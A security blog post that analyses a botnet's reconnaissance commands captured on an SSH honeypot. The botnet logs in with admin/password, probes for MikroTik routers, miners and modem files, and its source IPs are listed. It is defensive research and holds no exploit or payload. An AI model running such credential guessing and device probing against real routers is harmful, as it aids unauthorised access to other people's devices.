A Botnet's Search for MikroTik Routers

Last Updated: 2021-02-04

Last month, I wrote a post about setting up honeypots on GCP where I stood up a low-interaction SSH honeypot. Since then, I’ve been able to log a few megabytes worth of unauthorized behavior. This post will report on a repeated security event targeting misconfigured MikroTik routers.

Event Behavior

The attacker logs into the honeypot using admin/password and then sends the commands seen below into the honeypot terminal. Several IP addresses have been logged exhibiting the same command entry patterns suggesting botnet activity. These source IPs are shared at the end of the post.

/ip cloud print
ifconfig
uname -a
cat /proc/cpuinfo
ps | grep '[Mm]iner'
ps -ef | grep '[Mm]iner'
ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
echo Hi | cat -n

Observations

In order to try to attribute a malware campaign to this behavior, we must analyze the movements by the attacking entity. This section discusses observations relating the commands used to potential motives in an attempt to learn more about the event behavior.

/ip cloud print

The command /ip cloud print prints the parameters set for RouterOS, the OS used by MikroTik devices. You can read about this command in the MikroTik wiki. Other tools using this command have not yet been identified, in accoradance with this, the command may be specific to MikroTik devices. MikroTik is a popluar networking vendor in Latvia. We will touch on MikroTik later on in this post.

ifconfig, uname, /proc/cpuinfo

The attackers search for ifconfig, uname, and proc/cpuinfo, in that order. ifconfig prints networking information. When called with no flags information about connected network interfaces are printed to the console, including your IP address and what kind of network interaces are available/active. Some network interfaces can give clues about the envronment a device is running in. For example, running ifconfig in a GCP Ubuntu 18.04 VM returns the lo loopback interface and ens4. Machines with Docker installed with show docker0.

uname print basic system information. uname -a will print all system information. On a GCP Ubuntu 18.04 VM uname -a returns:

$ uname -a
Linux monitor 4.15.0-1091-gcp #104~16.04.1-Ubuntu SMP Tue Dec 15 19:05:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

cat /proc/cpuinfo prints CPU information to the screen. Here is an example of output on a GCP Ubuntu 18.04 VM:

These commands are used to gather information about the device.

ps -ef | grep '[Mm]iner'

The ps command will print running process and along with some information about them. The -ef flags will print every process using the standard sytax where -e selects all processes and -f triggers full-format listing. It is interesting that both ps and ps -ef are used in the event. An example of the differences between the two commands is shown on a GCP Ubuntu 18.04 VM below:

Piping the active process output to grep [Mm]iner will return all processes with the word miner or Miner in them. This behavior may indicate the attacker is searching for active cryptominers running on the misconfigured system. Normally, running this command on say a GCP Ubunt 18.04 VM would return nothing, example below:

ls -la /dev/ttyGSM* /dev/ttyUSB-mod* ...

The botnet uses ls -la to search for specific set of system files. I’ve associated the requested files with potential related router services and listed the results the table below.

SMS

Yes, SMS like text messages. SMS stands for short message service used by mobile device and internet-connected devices. MikroTik supports sending SMS messages via GSM modem. Users report configuring their MikroTik to use text messages for router management including receiving health alert text messages from the router and/or being able to reset the admin/user password via SMS. See the MikroTik Wiki for more information.

GSM

GSM stands for Global System for Mobile Communications. GSM is the standard protocol for mobile communications. On a Mikrotik Router /dev/ttyGSM* may return the virtual serial ports in use by the RouterOS modem (kernel.org, 2011). Users in StackExchange discuss gaining a direct serial connection to a RB4011 MikroTik router using sudo screen /dev/ttyUSB0 115200 cs8 ixoff implying that ls -la /dev/ttyUSB* can be used to identify a live serial connection to an active router.

QMUX

/usr/bin/qmuxd points to the QMUX daemon. gmuxd is a linux user-space process to multiplex between programs interfacing with QMI (Qualcomm MSM Interface) and one or more shared-memory based QMUX ports offered by the broadband processor (Osmocom,2019). This Github issue from 2017 suggests it is related to critical modem-related messaging services. This other issue cites qmuxd as being the daemon responsible for talking to the modem via shared memory on Android.

/etc/config/simman

Limited information on /etc/config/simman was discovered on common search engines. For instance, DuckDuckGo will only return 2 unique results. The only conclusive results returned with this string were live honeypot dashboards and websites written in Russian. I’ve translated the relevant results below.

Как изменить APN? : Техническая поддержка nano /etc/config/simman. Меняем параметры option GPRS_apn. config sim0 option priority ‘1’ option GPRS_apn ’tele91.msk’ config sim1 option priority ‘0’ option GPRS_apn ’tele91.msk’ Сохраняем файл с настройками: Ctrl+X потом подтверждаем сохранение под тем же именем

How to change APN?: Technical Support nano / etc / config / simman. Change the parameters of option GPRS_apn. config sim0 option priority ‘1’ option GPRS_apn ’tele91.msk’ config sim1 option priority ‘0’ option GPRS_apn ’tele91.msk’ Save the settings file: Ctrl + X then confirm saving under the same name

Настройки Менеджера SIM карт : Техническая поддержка Для настройки Менеджера SIM с помощью консоли, необходимо открыть файл /etc/config/simman: nano /etc/config/simman. В открывшемся окне Вы можете произвести конфигурацию: config simman ‘core’

SIM Card Manager Settings: Technical Support To configure the SIM Manager using the console, open the file /etc/config/simman: nano /etc/config/simman. In the window that opens, you can configure: config simman ‘core’

This was an additional result returned from Google:

Роутеры TELEOFIS RTU968, RTU1068 V2. Руководство …

Routers TELEOFIS RTU968, RTU1068 V2. Manual …

The translated results suggest the botnet is checking for the existence of a configuration file related to SIM card management.

On a new GCP Ubuntu 18.04 VM the same la -la command returns no file matches:

echo Hi | cat -n

To help explain this behavior, I’ve displayed the expected output of echo Hi | cat -n.

$echo Hi | cat -n
1 Hi

Why would a robot want to print “Hi” to console? Let’s take a step back and look at the series of commands executed. The commands first search for information about the machine with ifconfig and uname. It looks for running processes with ‘miner’ in their process name. It checks for specific files, all checks that will fail on the honeypot. After executing these commands, the unauthorized entity prints a greeting to standard out in an unusual manner.

One explaination is that after determining the machine is a honeypot the botnet leaves a mark to record it has identified the machine as a honeypot. The mark could be a flag to prevent the botnet from dropping their malware on research honeypots.

Analysis

Related Security Researcher Reports

Similar behavior has been previously reported by security researcher @remco_verhoef. On June 13th 2018 Verhoef writes,

“We’ve found interesting new traffic within our Honeytrap agents, originating from servers within Russia only (to be specific, the netblock owned by NKS / NCNET Broadband)… they are executing all of the following ssh commands:”(SANS, 2018)

/ip cloud print
help
ifconfig
uname -a
show ip
cat /proc/cpuinfo
uptime
ls -la
ls /data/data/com.android.providers.telephony/databases
echo Hi | cat -n
ps | grep '[Mm]iner'
ps -ef | grep '[Mm]iner'

In his post, Verhoef notes that since RouterOS v6.27 the /ip cloud print command has deprecated indicating that the targetted devices are those running software older than v6.27. Verhoef adds that because, “not all of the above commands are programmed to return the output expected by the script, it could be just probing for specifics about the attacked server,” (SANS, 2018).

MikroTik & Coinhive Campaign Reports

MikroTik is a router vender used Eastern Europe, based in Latvia. On May 23rd 2018, Cisco Talos reported that some MikroTik devices are vulnerable to VPNFilter malware, they warn routers were being compromised by Coinhive cryptocurrency malware. Talos identifies MikroTik RouterOS versions 1016, 1036, and 1072 for cloud core routers as vulnerable.

Two days later on May 25th, 2018 the FBI issued a public service announcement summarizing,

“Foreign cyber actors have compromised hundreds of thousands of home and office routers and other networked devices worldwide. The actors used VPNFilter malware to target small office and home office routers. The malware is able to perform multiple functions, including possible information collection, device exploitation, and blocking network traffic.”

Analyst Opinion

The security event analyzed in this post has been executed numerous times by several IP addresses on the HoneyTrap server hosted in GCP. The botnet appears quite active, crawling the internet for RouterOS devices with a weak username and password configuration. The motive of these events has not been confirmed, however, as suggested by the FBI there are numerous malicious operations that could be conducted on a compromised router.

Logged IP Addresses

Remember, botnets may operate from compromised endpoints. This means the IPs listed below may not necessarily be the endpoint of the “real” attacking entity, but could instead potentially be zombified victim endpoints or VPN endpoints.

The event described in this post has been captured multiple times by the following addresses:

51.222.139.65
174.124.123.109
185.110.91.235

The event described in this post is associated with the following hosts once:

5.228.46.151
83.165.192.43
97.121.144.188
98.125.186.145
162.104.171.249
176.31.46.240
188.32.225.20
219.94.94.161